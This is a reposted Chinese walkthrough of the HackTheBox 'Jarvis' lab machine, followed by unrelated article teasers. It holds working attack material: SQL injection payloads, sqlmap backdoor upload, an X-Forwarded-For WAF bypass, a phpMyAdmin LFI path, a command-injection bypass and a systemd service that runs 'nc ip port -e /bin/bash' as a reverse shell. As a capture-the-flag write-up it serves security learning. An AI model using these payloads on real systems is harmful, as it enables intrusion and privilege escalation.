HTB-Jarvis

news2025/1/19 17:22:23

HTB-Jarvis

  • 信息收集
    • 80端口
  • www-data(sqlmap)
  • www-data(myPhpAdmin)
  • www-data -> pepper
  • pepper -> root

在这里插入图片描述

信息收集

在这里插入图片描述

80端口

在这里插入图片描述
目录扫描
在这里插入图片描述
我啥也没干咋就被ban了,可能是gobuster流量太大被逮住了。

在这里插入图片描述

老老实实等90秒,先从已有的目录收集信息。
phpMyAdmin 4.8.0在这里插入图片描述
phpMyAdmin登陆界面。

在这里插入图片描述
主页面的room.php有一个cod参数。

在这里插入图片描述
测试9-8结果如下,初步怀疑有SQL注入可能性。
在这里插入图片描述
经过测试发现可能存在时间盲注,cod=1 and if(1=1,sleep(5),1) -- -(请原谅我当时脑子抽了)。
在这里插入图片描述
测试报错注入可能性较低。
在这里插入图片描述
写个脚本来跑,大概率会被ban,测试发现使用XFF参数配合可以绕过WAF/IPS对ip的检测。

在这里插入图片描述

因为可能是网络的原因,有时候在网页僵住半天没动静。只能手动加脚本配合来跑数据库,最后跑出来的数据库是hotel,information_schema,mysql,performance_schema,并没有发现有意思的库。hotel表也只是与房间有关的字段像cod、name、price等。使用sqlmap以最低能力注入。
sqlmap -u http://10.10.10.143/room.php?cod=1 --batch -random-agent -risk 1 -level 1
GET parameter ‘cod’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 4144=4144

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 2711 FROM (SELECT(SLEEP(5)))KcRx)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-2595 UNION ALL SELECT NULL,CONCAT(0x7178716271,0x7a58484763744c714c7972586b7647554757717a48505570757a6555746b4c68717a796b51415175,0x717a786271),NULL,NULL,NULL,NULL,NULL-- -
---
[06:40:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

www-data(sqlmap)

sqlmap -u http://10.10.10.143/room.php?cod=1 -random-agent -risk 1 -level 1 --os-shell --batch
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[06:43:48] [INFO] retrieved web server absolute paths: '/images/'
[06:43:48] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[06:43:49] [WARNING] unable to upload the file stager on '/var/www/'
[06:43:49] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[06:43:49] [WARNING] expect junk characters inside the file as a leftover from UNION query
[06:43:49] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[06:43:50] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[06:43:51] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://10.10.10.143:80/tmpuzawk.php
[06:43:52] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://10.10.10.143:80/tmpbmzsb.php
[06:43:52] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> 

并且我们还知道了Mysql版本是4.1.2,从passwd可知目标存在一个pepper用户。
在这里插入图片描述

获取一个较为完整的shell。

在这里插入图片描述

在/var/www/html/connection.php发现了$connection=new mysqli('127.0.0.1','DBadmin','imissyou','hotel');

在这里插入图片描述

看看能用在什么地方,比如phpMyAdmin上。

DBadmin:imissyou

在这里插入图片描述
可是我们已经通过sqlmap获取了shell,不出意外应该还有一种办法获取shell吧,那我们就假装不知道发生了什么从头来一遍。

www-data(myPhpAdmin)

我们经过测试知道了拥有数字注入,并且知道了行数。
在这里插入图片描述
在这里插入图片描述
获取表名。
在这里插入图片描述
字段名?cod=-1 union select 1,2,3,4,group_concat(column_name),6,7%20 from information_schema.columns where table_name='room'-- -,不过没有发现任何有用的字段。
在这里插入图片描述
查看一下mysql数据库。
在这里插入图片描述
假设目标没有对user表进行更改。

在这里插入图片描述

-1 union select 1,2,3,group_concat(Password),group_concat(User),6,7%20 from mysql.user -- -

在这里插入图片描述
将hash保存下来使用hashcat破解。
在这里插入图片描述
获得了DBadmin:imissyou,并使用其登录phpMyAdmin,可以知道phpMyAdmin的具体版本。
在这里插入图片描述
接着查找web应用绝对路径。在查看其他版本的RCE脚本时发现了这个路径。
在这里插入图片描述

随后找到了myPhpAdmin 4.8.x的LFI。
在这里插入图片描述
首先执行select '<?php phpinfo();exit;?>'语句。

在这里插入图片描述
在这里插入图片描述

然后获取myphpadmin的session值。
在这里插入图片描述

通过这个目录index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/var/lib/php/sessions/sess_你的phpMyAdmin的session值。
在这里插入图片描述
从中获取到网络应用的绝对路径。
在这里插入图片描述
先查看一下我们有没有权限写入文件。

secure_file_priv为空,不对读写做任何限制;
secure_file_priv为NULL,禁止限制操作;
secure_file_priv为一个目录,只能对该目录下文件操作。

在这里插入图片描述
写入shell。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

www-data -> pepper

有一个python文件允许我们无需密码使用pepper的身份运行。
在这里插入图片描述
/var/www/Admin-Utilities/simpler.py里面有一段代码,不过会对输入尽心判断。

在这里插入图片描述
这个代码片段很有意思,用了个很巧妙的方法来进行判断。可能我们第一时间想到的是一个for取黑名单,一个for取输入的值,再用一个if来判断是否相等。作者直接取黑名单的值,接着直接用if 来判断,这很有趣。
在这里插入图片描述
黑名单虽然禁止了``但是没有禁止$()。
在这里插入图片描述
短横线-也可以通过unicode编码绕过。
在这里插入图片描述

但是加在ping后面就不好使了。
在这里插入图片描述
暂时没有思路了,试试拷贝呢。

0 $(cp /bin/bash .)

OK,复制过来了。
在这里插入图片描述

修改复制过来的bash的所属组。

0 $(chown pepper:$(cat www) bash) 等同于 0 $(chown pepper:www-data bash)

在这里插入图片描述
行吧,继续回到反弹shell上。
在这里插入图片描述
在这里插入图片描述

pepper -> root

find / -perm -04000 2>/dev/null

在这里插入图片描述

首先准备一个poc.service文件用来链接提权,内容与下:

[Unit] Description=roooooooooot

[Service] Type=simple User=root ExecStart=/bin/bash -c ‘nc ip port -e /bin/bash’

[Install] WantedBy=multi-user.target

在这里插入图片描述
下载到攻击机,后执行。

/bin/systemctl enable /home/pepper/poc.service
#出现下面几行代表连接成功
Created symlink /etc/systemd/system/multi-user.target.wants/poc.service -> /home/pepper/poc.service.
Created symlink /etc/systemd/system/poc.service -> /home/pepper/poc.service.
#接着启动
/bin/systemctl start root

在这里插入图片描述
失败的man

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/434850.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

X 态及基于 VCS 的 X-Propagation 检测

&#x1f525;点击查看精选 IC 技能树系列文章&#x1f525; &#x1f525;点击进入【芯片设计验证】社区&#xff0c;查看更多精彩内容&#x1f525; &#x1f4e2; 声明&#xff1a; &#x1f96d; 作者主页&#xff1a;【MangoPapa的CSDN主页】。⚠️ 本文首发于CSDN&#…

Lightroom Classic2022图文安装教程

Lightroom Classic是一款专业的数字照片处理软件&#xff0c;具有数字照片编辑、照片整理和管理、批量处理、智能预览、输出等特点。 该软件适用于摄影师和数字照片后期处理爱好者&#xff0c;可以帮助用户提高处理效率和照片质量。 Lightroom Classic是Adobe公司推出的系列软…

ai智能写作软件哪个好-ai智能写作免费

人工智能自动写作软件 人工智能自动写作软件是如今数字营销领域中备受瞩目的一种工具。无论是网络文章、博客、报告、新闻稿或者其他一些营销内容&#xff0c;人工智能自动写作软件可以以相当高的速度和质量将其生成&#xff0c;从而释放人类营销人员的时间和精力。 尽管自动写…

深度学习实战案例:基于 AutoRec 构建电影推荐系统( 附 PyTorch 版代码)

文章目录 技术交流前言AutoRec 模型介绍损失函数基于 AutoRec 的推荐过程实验对比消融实验代码实践总结参考 本文要介绍的 AutoRec 模型是由澳大利亚国立大学在2015年提出的&#xff0c;它将自编码器(AutoEncoder)的思想与协同过滤(Collaborative Filter)的思想结合起来&#x…

GitHub 创建 Pull Request 将代码提交至别人的仓库

GitHub 创建 Pull Request 将代码提交至别人的仓库 1 Forking the repository 1.1 About forks (关于 forks) A fork is a new repository that shares code and visibility settings with the original upstream repository. A fork 是一个新的存储库&#xff0c;它与原 ups…

U-Boot 命令使用

进入 uboot 的命令行模式以后输入“help”或者“&#xff1f;”&#xff0c;然后按下回车即可查看当前 uboot 所 支持的命令&#xff0c;如图 所示&#xff1a; 我们输入“help(或?) 命令名”既可以查看命令的详细用法&#xff0c;以“bootz”这 个命令为例&#xff0c;我们输…

4种吃子跳棋

目录 一&#xff0c;双玩家吃子跳棋 玻璃跳棋 大人物跳棋 二&#xff0c;单玩家吃子跳棋 智力游戏67跳棋&#xff08;5&#xff09; 一个挑战 跳瓶盖 欢乐跳跳棋 三&#xff0c;单玩家多目吃子跳棋——Hopping dots 1&#xff0c;Hopping dots 2&#xff0c;规则 3…

说过的话就一定要办到 - redo日志

一、什么是redo日志&#xff1f; 如果我们只在内存的 Buffer Pool 中修改了页面&#xff0c;假设在事务提交后突然发生了某个故障&#xff0c;导致内存中的数据都失效了&#xff0c;那么这个已经提交了的事务对数据库中所做的更改也就跟着丢失了&#xff0c;这会导致事务会失去…

火力全开,重新定义蓝牙耳机!新一代南卡OE Pro不入耳式蓝牙耳机震撼来袭

中国专业声学品牌Nank南卡&#xff0c;在近期推出了南卡OE Pro不入耳蓝牙耳机&#xff0c;是业内首款功能配置齐全的蓝牙耳机&#xff0c;以创新开放式听音方式&#xff0c;让更多人感受到不入耳开放式耳机带来的魅力之处。据了解&#xff0c;有不少媒体猜测&#xff0c;南卡OE…

工作面试老大难 - 锁

一、概述 为保证数据的一致性和完整性&#xff0c;需要对 事务间并发操作进行控制 &#xff0c;因此产生了 锁 。锁冲突 也是影响数据库 并发访问性能 的一个重要因素。所以锁对数据库而言显得尤其重要&#xff0c;也更加复杂。 二、并发问题 MySQL并发事务访问相同记录 &am…

硬件设计--DAPLINK设计

1 参考网站 1、打造属于你自己的STM32下载器调试器--------DAPLink 2、ARMmebed官方开源代码DAPLink 3、ARMmebed官方开源代码DAPLink github加速网站 4、ARMmebed官方开源硬件旧版 5、ARMmebed官方开源硬件新版 6、自制DAPLink – ARM官方源码以及STM32F103C8T6 7、如何做一个…

软件测试之测试名词解释

1. 白盒测试&#xff0c;英文是white-box testing 是通过程序的源代码进行测试而不使用用户界面。这种类型的测试需要从代码句法发现内部代码在算法&#xff0c;溢出&#xff0c;路径&#xff0c;条件等等中的缺点或者错误&#xff0c;进而加以修正。 2. 黑盒测试&#xff0c;英…

word脚标【格式:第X页(共X页)】

不得不吐槽一下这个论文&#xff0c;真的我好头疼啊。我又菜又不想改。但是还是得爬起来改 &#xff08;是谁大半夜不能睡觉加班加点改格式啊&#xff09; 如何插入页码。 格式、要求如下: 操作步骤&#xff1a; ①双击页脚&#xff0c;填好格式&#xff0c;宋体小四和居中都…

除了 Swagger,这个开源 API 管理工具生成文档更高效

提起 Swagger&#xff0c;经常接触接口开发的朋友&#xff0c;一定知道并且都熟练使用了。 Swagger 是一个用于生成、描述和调用 RESTful 接口的 Web 服务。通俗的来讲&#xff0c;Swagger 就是将项目中所有&#xff08;想要暴露的&#xff09;接口展现在页面上&#xff0c;并且…

VMware ESXi 8.0U1 发布 - 领先的裸机 Hypervisor

请访问原文链接&#xff1a;https://sysin.org/blog/vmware-esxi-8-u1/&#xff0c;查看最新版。原创作品&#xff0c;转载请保留出处。 作者主页&#xff1a;sysin.org 2023-04-18, VMware vSphere 8.0U1 发布。 详见&#xff1a;VMware vSphere 8 Update 1 新增功能 产品简…

ai智能写作助手-ai自动写作软件

为什么要用ai智能写作工具 在数字化时代&#xff0c;AI&#xff08;人工智能&#xff09;技术已经被广泛应用于各种领域&#xff0c;其中之一是写作。AI智能写作工具是利用自然语言处理技术和机器学习算法来生成高质量的文章、博客、新闻稿等。这些工具不仅提供了便捷、高效的…

校园网策列及思路

解决思路一&#xff1a; 适合以下情况也是我现在的学校校园网大概情况&#xff1a; 内网不认证情况下可以互联&#xff0c;除了几个常见端口封闭&#xff08;目前已知3389&#xff09;&#xff0c;要联网必须认证登录&#xff0c;而且一个号最多两台设备&#xff08;甚至有时候…

FANUC机器人DCS功能基本介绍

FANUC机器人DCS功能基本介绍 1. 定义 DCS(Dual Check Safety)位置/速度检查功能;利用机器人控制柜中两个独立CPU进行电机速度和位置数据的检查,实时检查位置和速度误差,并通过两个独立的通道关闭电机电源。 DCS功能可以有效地节约占地面积。 DCS功能可以防止机器人工具…

工业通讯应用中主流的常用协议Modbus协议

智联物联技术分享&#xff0c;本期为大家介绍工业通讯常用的主流协议Modbus协议。 Modbus协议的前身叫做Mod协议&#xff0c;常被用于Modicon公司的PLC控制器中&#xff0c;后来Modicon被Schneider收购后随之改名为我们如今所熟悉的modbus协议&#xff0c;现如今广泛应用在物联…

【高级数据结构】红黑树

本文整理红黑树学习过程中的知识点和底层代码实现。 目录 基本概念1、介绍2、应用3、性质 实现红黑树1、原理2、操作1&#xff09;查找2&#xff09;插入3&#xff09;删除 和其他相似结构的对比1、二叉搜索树&#xff08;BST&#xff09;2、AVL树1&#xff09;例子2&#xff0…